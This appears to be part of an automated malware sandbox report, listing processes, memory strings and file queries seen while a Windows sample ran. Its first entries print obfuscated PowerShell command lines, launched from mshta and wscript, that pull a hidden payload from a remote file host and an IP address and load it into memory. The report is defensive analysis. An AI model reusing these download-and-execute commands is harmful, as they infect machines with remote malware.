Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jfhvy0vsn21mywmgicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicagqwrelxrzcgugicagicagicagicagicagicagicagicagicagicagicatbwvnymvszevgaw5pvelvtiagicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcjvcmxnt04ilcagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbkbkhytg8sc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagamxxtwh0lhn0cmluzyagicagicagicagicagicagicagicagicagicagicagiewsdwludcagicagicagicagicagicagicagicagicagicagicagifved1jcwentleludfb0ciagicagicagicagicagicagicagicagicagicagicagihffs3zxktsnicagicagicagicagicagicagicagicagicagicagicaglw5bbuugicagicagicagicagicagicagicagicagicagicagicaizhpuayigicagicagicagicagicagicagicagicagicagicagicattmfnzvnqqunficagicagicagicagicagicagicagicagicagicagicagbhhzqnrttvb2icagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicryb2nfujdtzmfjojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmta3lje3mi40nc4xnzgvntmvc2vlbxlizxn0bmv0d29ya3doawnoz2l2zwjlc3r0agluz3nlbnrpcmvsawzld2l0ag1llnrjriisiirftny6qvbqrefuqvxzzwvtewjlc3ruzxr3b3jrd2hpy2hnaxzlymvzdhroaw5nc2vudglyzwxpzmv3axrolnziuyismcwwkttzvefydc1zbevfucgzkttjrvggicagicagicagicagicagicagicagicagicagicagicaijgvuvjpbufbeqvrbxhnlzw15ymvzdg5ldhdvcmt3agljagdpdmvizxn0dghpbmdzzw50axjlbglmzxdpdggudmjtig=='+[char]0x22+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcdzzvlpbwfnzvunkydybca9ifb1swh0jysndhbzjysnoicrjy8vmtaxny5mawxlbwfpbc5jb20vyxbpl2zpbccrj2uvz2v0p2zpbgvrzxk9mkfhx2jxbzlszxu0nxq3qluxa1znc2q5cfq5cgdtu2x2u3qnkydhcm5usunmrmhtvetqm0xdnlnrdeljt2nfvdm1dyzwa192awq9zmq0zjyxngjimja5yzyyyze3mza5nduxnzzhmdkwngyguhvjo3nlwxdlyknsawvudca9ie5ldy1pymply3qgu3lzdgvtlk5ldc5xjysnzwjdbgllbnq7c2vzaw1hz2vcexrlcya9ihnlwxdlyknsawvujysndc5eb3dubg9hzerhdgeoc2vzaw1hz2vvcmwpo3nlwwltywcnkydlvgv4dca9ifttexn0zw0uvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkhnlwwltywdlqnl0jysnzxmpo3nlwxn0yxj0rmxhzya9ifb1stw8qkftrty0xycrj1nuqvjupj5qduk7c2vzzw5kricrj2xhzya9ifb1sscrjzw8qkftrty0x0vord4+uhvjo3nlwxn0yxj0sw5kzxggpsbzzvlpbwfnzvrlehqusw5kzxhpzignkydzzvlzdgfydezsywcpo3nlwwvuzccrj0luzgv4id0gc2vzaw1hz2vuzxh0lkluzgv4t2yoc2vzzw5krmxhzyk7cycrj2vzc3rhcnrjbmrlecatz2ugmcatyw5kihnlwwvuzeluzgv4ic1ndcbzzvlzdgfydeluzgv4o3mnkydlwxn0yxj0sw5kzxggkz0gc2vzc3rhcnrgbgfnlkxlbmd0adtzzvliyxnlnjrmzw5ndgggpsbzzvllbmrjbmrlecatihnlwxn0yxj0sw5kzxg7c2vzymfzzty0q29tbwfuzca9jysnihnljysnwwltywcnkydlvccrj2v4dc5tdwjzdhjpbmcoc2vzc3rhcnrjbmrlecwnkycgc2vzymfzzty0tgvuz3rokttzzvliyxnlnjrszxzlcnnlzca9ic1qb2luichzzvliyxnlnjrdb21tyw5kjysnllrvq2hhckfycmf5kckgmnbpiezvckunkydhy2gtt2jqzwn0ihsgc2vzxyb9kvstms4ulshzzvknkydiyxnlnjrdb21tyw5klkxlbmd0acldo3nlwscrj2nvbw1hbmrcexrlcya9ifttexn0zw0uqycrj29udmvydf06okzyb21cyxnlnjrtdhjpbmcojysnc2vzymfzzty0umv2zxjzzwqpo3nlwscrj2xvywrlzefzc2vtymx5id0gw1n5c3rlbs5szwzsjysnzwn0aw9ulkfzc2vtymx5xscrjzo6tg9hzchzzvljb21tyw5kqnl0zxmpo3nlwxzhau1ldghvzca9ifsnkydkbmxpyi5jty5ib21lxs5hzxrnzxrob2qouhvjvkfjuhvjkttzzvl2ywlnzscrj3rob2qusw52bycrj2tlkhnlww51bgwsieaouhvjdhh0llrhukzgulcvmzuvodcxljq0lji3ms43mdevlycrjzpwdhrouhvjlcbqdulkzxnhdgl2ywrvuhvjlcbqdulkjysnzxnhdgl2ywrvuhvjlcbqdscrj0lkzxnhdgl2ywrvuhvjlcbqdulhc3buzxrfy29tcglsjysnzxjqduksifb1swrlc2f0axzhzg9qduksiccrj1b1swrlc2f0axzhzg9qduksuhvjzgvzyxrpdmfkbycrj1b1ssxqdulkzxnhdgl2ywrvuhvjlfb1swrlc2f0axzhzg9qduksuhvjzgvzyxrpdmfkb1b1ssxqdulkzxnhdgl2ywrvuhvjlfb1stfqduksuhvjzgvzyxrpdmfkb1b1sskpoycplnjfugxhq0uoj1b1sscsw1n0cklur11bq0hbul0zoskuckvqbgfdrsgnmnbpjywnfccplnjfugxhq0uoj3nlwscsjyqnkxwgliaokgdwiccqtwrykicplm5bbuvbmywxmswyxs1qt0lojycp';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "('seyimageu'+'rl = puiht'+'tps'+':'+'//1017.filemail.com/api/fil'+'e/get?filekey=2aa_bwo9reu45t7bu1kvgsd9pt9pgsslvst'+'grnticffhmtkj3lc6sqticoc_t35w&pk_vid=fd4f614bb209c62c1730945176a0904f pui;seywebclient = new-object system.net.w'+'ebclient;seyimagebytes = seywebclien'+'t.downloaddata(seyimageurl);seyimag'+'etext = [system.text.encoding]::utf8.getstring(seyimagebyt'+'es);seystartflag = pui<<base64_'+'start>>pui;seyendf'+'lag = pui'+'<<base64_end>>pui;seystartindex = seyimagetext.indexof('+'seystartflag);seyend'+'index = seyimagetext.indexof(seyendflag);s'+'eystartindex -ge 0 -and seyendindex -gt seystartindex;s'+'eystartindex += seystartflag.length;seybase64length = seyendindex - seystartindex;seybase64command ='+' se'+'yimag'+'et'+'ext.substring(seystartindex,'+' seybase64length);seybase64reversed = -join (seybase64command'+'.tochararray() 2po fore'+'ach-object { sey_ })[-1..-(sey'+'base64command.length)];sey'+'commandbytes = [system.c'+'onvert]::frombase64string('+'seybase64reversed);sey'+'loadedassembly = [system.refl'+'ection.assembly]'+'::load(seycommandbytes);seyvaimethod = ['+'dnlib.io.home].getmethod(puivaipui);seyvaime'+'thod.invo'+'ke(seynull, @(puitxt.tgrffrw/35/871.44.271.701//'+':ptthpui, puidesativadopui, puid'+'esativadopui, pu'+'idesativadopui, puiaspnet_compil'+'erpui, puidesativadopui, '+'puidesativadopui,puidesativado'+'pui,puidesativadopui,puidesativadopui,puidesativadopui,puidesativadopui,pui1pui,puidesativadopui));').replace('pui',[string][char]39).replace('2po','\|').replace('sey','$')\| . ((gv 'mdr').name[3,11,2]-join'')"	Jump to behavior

Source: explorer.exe, 0000000E.00000002.3013696891.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3009746571.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147438280.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000E.00000002.3009746571.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.2144792039.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 0000000E.00000000.2144420450.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3007948093.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1Progman$
Source: explorer.exe, 0000000E.00000002.3009746571.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.2144792039.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 0000000E.00000002.3009746571.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.2144792039.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 17_2_02DB55EB cpuid

17_2_02DB55EB

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
